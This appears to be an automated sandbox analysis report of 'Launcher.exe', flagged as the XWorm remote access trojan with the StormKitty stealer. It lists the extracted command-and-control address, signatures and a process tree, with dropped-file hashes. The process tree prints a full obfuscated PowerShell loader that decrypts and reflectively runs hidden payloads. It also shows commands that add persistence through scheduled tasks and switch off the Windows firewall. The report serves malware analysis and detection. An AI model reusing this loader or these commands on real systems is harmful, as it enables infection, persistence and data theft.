Resubmissions

25/09/2024, 14:52

240925-r8vsba1elp 10

25/09/2024, 14:49

240925-r631xavbmf 10

Analysis

  • max time kernel
    594s
  • max time network
    602s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25/09/2024, 14:52

General

  • Target

    Launcher.exe

  • Size

    7.4MB

  • MD5

    86e47632419e01d5a5a102ca0b9273e1

  • SHA1

    1819b64f21b0290b0610899f4d4c64f6152a3cfc

  • SHA256

    36caf389f8c2d1898c6a5b2df76b44dc5953852141b10c21ce4e8ea2db55b2b9

  • SHA512

    f4d1901dedd42716a9343168afe013c19bb983f7c3e473b1216979aef54f882214013a66b8722e79ef94ff0d50e829372c47bbd27fbf2b0f43fefc0692c8052f

  • SSDEEP

    98304:wTwedwe0xX21lEsTv9gubxzuVEXjqjvnvSboSM:wtwe0xXCWxubxzujvS8SM

Malware Config

Extracted

Family

xworm

Version

5.0

C2

89.85.183.63:928

Mutex

ImuGwJzkMH1FDK0U

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 54 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Windows\system32\wscript.exe
      wscript C:\Users\Admin\AppData\Local\Temp\kXmONzbeuL.vbs C:\Users\Admin\AppData\Local\Temp\kXmONzbeuL.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:244
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kXmONzbeuL.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2608
        • C:\Windows\system32\net.exe
          net file
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1564
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 file
            5⤵
              PID:3744
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dKf7gcQ929Oc7g0ElBNFOpMBFb8jbwMLhvGP43UPh20='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5jRuOKduZsFFzTiTcHd89A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xrcEr=New-Object System.IO.MemoryStream(,$param_var); $RFVUj=New-Object System.IO.MemoryStream; $pNxOF=New-Object System.IO.Compression.GZipStream($xrcEr, [IO.Compression.CompressionMode]::Decompress); $pNxOF.CopyTo($RFVUj); $pNxOF.Dispose(); $xrcEr.Dispose(); $RFVUj.Dispose(); $RFVUj.ToArray();}function execute_function($param_var,$param2_var){ $pNGMt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BRZOL=$pNGMt.EntryPoint; $BRZOL.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\kXmONzbeuL.bat';$Mnidd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\kXmONzbeuL.bat').Split([Environment]::NewLine);foreach ($WvKGY in $Mnidd) { if ($WvKGY.StartsWith(':: ')) { $KRBOT=$WvKGY.Substring(3); break; }}$payloads_var=[string[]]$KRBOT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4532
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_526_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_526.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5040
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_526.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4084
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_526.bat" "
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3552
                • C:\Windows\system32\net.exe
                  net file
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2036
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 file
                    8⤵
                      PID:4156
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dKf7gcQ929Oc7g0ElBNFOpMBFb8jbwMLhvGP43UPh20='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5jRuOKduZsFFzTiTcHd89A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xrcEr=New-Object System.IO.MemoryStream(,$param_var); $RFVUj=New-Object System.IO.MemoryStream; $pNxOF=New-Object System.IO.Compression.GZipStream($xrcEr, [IO.Compression.CompressionMode]::Decompress); $pNxOF.CopyTo($RFVUj); $pNxOF.Dispose(); $xrcEr.Dispose(); $RFVUj.Dispose(); $RFVUj.ToArray();}function execute_function($param_var,$param2_var){ $pNGMt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BRZOL=$pNGMt.EntryPoint; $BRZOL.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_526.bat';$Mnidd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_526.bat').Split([Environment]::NewLine);foreach ($WvKGY in $Mnidd) { if ($WvKGY.StartsWith(':: ')) { $KRBOT=$WvKGY.Substring(3); break; }}$payloads_var=[string[]]$KRBOT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    7⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Drops startup file
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:2512
                    • C:\Windows\System32\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Brocker" /tr "C:\Users\Admin\AppData\Roaming\Runtime Brocker"
                      8⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:3780
                    • C:\Windows\System32\netsh.exe
                      "C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off
                      8⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3000
                    • C:\Windows\SYSTEM32\CMD.EXE
                      "CMD.EXE"
                      8⤵
                        PID:3760
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb2xs
                        8⤵
                        • Enumerates system info in registry
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        • Suspicious use of WriteProcessMemory
                        PID:1816
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe5ff73cb8,0x7ffe5ff73cc8,0x7ffe5ff73cd8
                          9⤵
                            PID:2284
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
                            9⤵
                              PID:3612
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 /prefetch:3
                              9⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1140
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:8
                              9⤵
                                PID:2832
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                                9⤵
                                  PID:2384
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                                  9⤵
                                    PID:960
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1
                                    9⤵
                                      PID:4884
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
                                      9⤵
                                        PID:4580
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4000 /prefetch:8
                                        9⤵
                                          PID:1328
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 /prefetch:8
                                          9⤵
                                            PID:1064
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
                                            9⤵
                                              PID:1388
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2912 /prefetch:1
                                              9⤵
                                                PID:1664
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
                                                9⤵
                                                  PID:1304
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
                                                  9⤵
                                                    PID:4824
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,17603238521154766214,8112547794201584812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6376 /prefetch:8
                                                    9⤵
                                                      PID:1612
                                    • C:\Users\Admin\AppData\Roaming\Runtime Brocker
                                      "C:\Users\Admin\AppData\Roaming\Runtime Brocker"
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3156
                                    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
                                      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
                                      1⤵
                                      • Modifies registry class
                                      • Suspicious use of SetWindowsHookEx
                                      PID:3980
                                    • C:\Windows\system32\taskmgr.exe
                                      "C:\Windows\system32\taskmgr.exe" /0
                                      1⤵
                                        PID:1504
                                      • C:\Windows\system32\taskmgr.exe
                                        "C:\Windows\system32\taskmgr.exe" /0
                                        1⤵
                                        • Checks SCSI registry key(s)
                                        • Checks processor information in registry
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:1612
                                      • C:\Users\Admin\AppData\Roaming\Runtime Brocker
                                        "C:\Users\Admin\AppData\Roaming\Runtime Brocker"
                                        1⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3292
                                      • C:\Windows\system32\taskmgr.exe
                                        "C:\Windows\system32\taskmgr.exe" /0
                                        1⤵
                                          PID:1064
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:2348
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:2232
                                            • C:\Windows\System32\CompPkgSrv.exe
                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                              1⤵
                                                PID:2020
                                              • C:\Windows\system32\AUDIODG.EXE
                                                C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004E0
                                                1⤵
                                                  PID:2108
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                  1⤵
                                                    PID:2168

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtime Brocker.log

                                                    Filesize

                                                    2KB

                                                    MD5

                                                    627073ee3ca9676911bee35548eff2b8

                                                    SHA1

                                                    4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                    SHA256

                                                    85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                    SHA512

                                                    3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                    Filesize

                                                    3KB

                                                    MD5

                                                    df472dcddb36aa24247f8c8d8a517bd7

                                                    SHA1

                                                    6f54967355e507294cbc86662a6fbeedac9d7030

                                                    SHA256

                                                    e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

                                                    SHA512

                                                    06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                    Filesize

                                                    152B

                                                    MD5

                                                    6fdbe80e9fe20761b59e8f32398f4b14

                                                    SHA1

                                                    049b1f0c6fc4e93a4ba6b3c992f1d6cecf3ada1f

                                                    SHA256

                                                    b7f0d9ece2307bdc4f05a2d814c947451b007067ff8af977f77f06c3d5706942

                                                    SHA512

                                                    cf25c7fd0d6eccc46e7b58949c16d17ebeefb7edd6c76aa62f7ab5da52d1c6fc88bde620be40396d336789bd0d62b2162209a947d7ab69389e8c03682e880234

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                    Filesize

                                                    152B

                                                    MD5

                                                    9828ffacf3deee7f4c1300366ec22fab

                                                    SHA1

                                                    9aff54b57502b0fc2be1b0b4b3380256fb785602

                                                    SHA256

                                                    a3d21f0fb6563a5c9d0f7a6e9c125ec3faaa86ff43f37cb85a8778abc87950f7

                                                    SHA512

                                                    2e73ea4d2fcd7c8d52487816110f5f4a808ed636ae87dd119702d1cd1ae315cbb25c8094a9dddf18f07472b4deaed3e7e26c9b499334b26bdb70d4fa7f84168d

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                    Filesize

                                                    5KB

                                                    MD5

                                                    03478e9f8787cc455b7e29997b8930b8

                                                    SHA1

                                                    d845c1f47a75217d9fb476faebdceac7e0df01d2

                                                    SHA256

                                                    285cf8f19a0200a99d1c2d56f2157ac91117356bc5d38230141a09bc28cac3f4

                                                    SHA512

                                                    f9bccf90fbde75e03f58fbfc3330b05222352d44dfbb8bcaef91e9ea5bbf4f9eafe4f18fcbd3f634fbf1b8bedb90afeff8a488a49f8e8c811c21ca09864af6c2

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                    Filesize

                                                    89B

                                                    MD5

                                                    a519f232768375147b1ff5cb1c19b76c

                                                    SHA1

                                                    cdab10a9b29493244adee1909f72cbe7cc852310

                                                    SHA256

                                                    478ef5f8fffade921937004ceb173d54c81c50ea471bab6aa244858693adbfde

                                                    SHA512

                                                    81de276f1855e8c8e0d03341185c970d120a3fdec75b16e02bfc1d06d881aea1aeed6b5ea4dfc005d8d1d62ec21d5ed9221f3e6560fadd52762d645e049cfadc

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                    Filesize

                                                    146B

                                                    MD5

                                                    54dd1fbf414018dcdea26cea019deaa7

                                                    SHA1

                                                    d128d7cb3c896f581f7d6582198d8a50f71b06c1

                                                    SHA256

                                                    aa06113e9f5397554fbd7ec591b660283d256b953ca778f808308ee6f4c56ba7

                                                    SHA512

                                                    ee90a5675391f44de93a4327404e2215035a3b231709045bd85cca45c6946a8b92d021f0837880109cdc656267543ce6b38b48b121def951c91c1506d5620825

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                    Filesize

                                                    82B

                                                    MD5

                                                    abdb42bd1b8bc2ae9afc85d2b2ddf63b

                                                    SHA1

                                                    c0c22d38cc0d71f8e8bfa4b7cad175e6c60adb79

                                                    SHA256

                                                    9fa2459c04e9488e48f513d5a66e295d665eaf8310a74cf4a9f2e049001ff08f

                                                    SHA512

                                                    1dc261fccadafc97fcb5695339bb325816facea066ecf05bda9e10f30ce4ba455d6be0c4040fe68aa7ca0b6a21659b6ac426b226ebbe5ce2f85e0cd5c913a1d7

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

                                                    Filesize

                                                    16B

                                                    MD5

                                                    46295cac801e5d4857d09837238a6394

                                                    SHA1

                                                    44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                    SHA256

                                                    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                    SHA512

                                                    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                    Filesize

                                                    16B

                                                    MD5

                                                    6752a1d65b201c13b62ea44016eb221f

                                                    SHA1

                                                    58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                    SHA256

                                                    0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                    SHA512

                                                    9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                    Filesize

                                                    62KB

                                                    MD5

                                                    e566632d8956997225be604d026c9b39

                                                    SHA1

                                                    94a9aade75fffc63ed71404b630eca41d3ce130e

                                                    SHA256

                                                    b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

                                                    SHA512

                                                    f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                    Filesize

                                                    1KB

                                                    MD5

                                                    402fb6d0f0a29f3c57c27026a66d6e70

                                                    SHA1

                                                    60a1533dbce5be6c6dec8bd5992278cfc148fe13

                                                    SHA256

                                                    7ef5142818d81d7cbbcdfca8ddd8b4ac53154f2802b1d7b98aa9c30e23a65ac1

                                                    SHA512

                                                    4c66b432fb50213c16d25e13cdf344cc203226e79eaf4f9aee53c28d29c1cdeb9edd7016c640f7ed0c278e36198fd4dc73c6f69ec5eeb4e73e9bbf36781b03bc

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    1KB

                                                    MD5

                                                    9665f44079e2ed28b3d426623291b219

                                                    SHA1

                                                    cc9ed0d8ffbb49e98034acca27f073b6db66032b

                                                    SHA256

                                                    6c8f1b0f7f78cbb20b1f0d8a41d80f47feb831ebb9ac64f3a868d3d124d4edfb

                                                    SHA512

                                                    86c4ed22bbaeeb12d53f547559d55121f5401bf3c830be67b7504b60e057d93ab88d65cbd59425e4be7fb5addc013a9115ec732afb101bf8500c438024ba1c0a

                                                  • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

                                                    Filesize

                                                    10KB

                                                    MD5

                                                    4d52399020a24c1f6b4254cc7252504b

                                                    SHA1

                                                    2afe0c8994c64898d5fe16ca68811438ef19b0ee

                                                    SHA256

                                                    e75a14ce8abaea1788c4361552ef9ef2b86ea02485eb4ad5f8c22c9c49ece3e7

                                                    SHA512

                                                    a481726d4ef1dfd67a86ae79e16abda87a0f370310758cc8a1bb2516a69557129e9612b9430c0ae11d7ddf72e1afc3375f5649a09bb53febe5cc16718ba976b4

                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bbe4ypej.lzm.psm1

